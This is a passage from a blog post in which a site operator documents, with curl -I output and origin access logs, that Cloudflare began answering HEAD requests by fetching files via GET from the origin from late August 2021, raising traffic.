    cf-cache-status: MISS
    accept-ranges: bytes
    expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Xg9TLgssa5Gm6j1fRlJZH8VahaoY21LdCE1W1JqVueu49mzdiTmh9MZp4pFZDsVeSmRg%2Bc%2FMryoN7tgmKUmdxhWzE7UZdVvgG%2FRxHSZ%2FYS6pDtxLwpXSD71jo5ADNyT4TSpKXtE%3D"}],"group":"cf-nel","max_age":604800}
    nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    server: cloudflare
    cf-ray: 689564111e594ee0-FRA
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

    This is the log right after the HEAD request. Not that I am sending HEAD request to domain.com and Cloudflare is sending GET request for the file.

    162.158.94.236 - - [04/Sep/2021:07:09:12 +0000] "GET /file1.webm HTTP/1.1" 200 2256504 "-" "curl/7.68.0" "188.254.161.195" "188.254.161.195"

    Then I send a second HEAD requests

    $ curl -I https://domain.com/file1.webm
    HTTP/2 200
    date: Sat, 04 Sep 2021 07:09:53 GMT
    content-type: video/webm
    content-length: 2256504
    last-modified: Sat, 04 Jan 2014 14:24:01 GMT
    etag: "52c81981-226e78"
    cache-control: max-age=14400
    cf-cache-status: HIT
    age: 42
    accept-ranges: bytes
    expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CKSvpGGHoj5LfV6xXpPUK5kHJtdsX3fylgt%2F2%2B6G94oUsdAd8FnHmUgEUIgnj5dd2Vvsv%2BKQxxgsHdHA0RvpjTxATakFKFuirMeI%2FS3lAdDX5VA0tY74z0CRYEHM2rS%2Fld6K738%3D"}],"group":"cf-nel","max_age":604800}
    nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    server: cloudflare
    cf-ray: 689565175dffc29f-FRA
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

    And then there is NOTHING in the log file

    Note that for the last HEAD request there is a “cf-cache-status: HIT”.

    Status and how it could be resolved?

    Yes, we are doing HEAD requests every day to the files in order to check that they are all working. Every day we send a HEAD request for every file to make sure all files are up to date. This has been going on for years and is a left over of an integrity check we implemented in 2015.

    What has changed on 28 of August 2021 is that when Cloudflare receives a HEAD request for a file it is sending a GET request to our machine in order to cache the file. This is what has changed and this is generating all the traffic.

    We send HEAD request with ‘curl -I’

    I have 30 weeks of log files that show that Cloudflare was sending HEAD requests like

    I have asked Cloudflare

    Could you please rollback this change in the infrastructure and do not send a GET request to our machine when you receive a HEAD request from a client?

    Let’s see how will this be resolved.

    Up to date conclusion

    Check your machines from time to time. I hope you don’t get in this situation.

    Want to keep in touch? – find me on LinkedIn or Twitter

     
c
compose new post
j
next post/next comment
k
previous post/previous comment
r
reply
e
edit
o
show/hide comments
t
go to top
l
go to login
h
show/hide help
shift + esc
cancel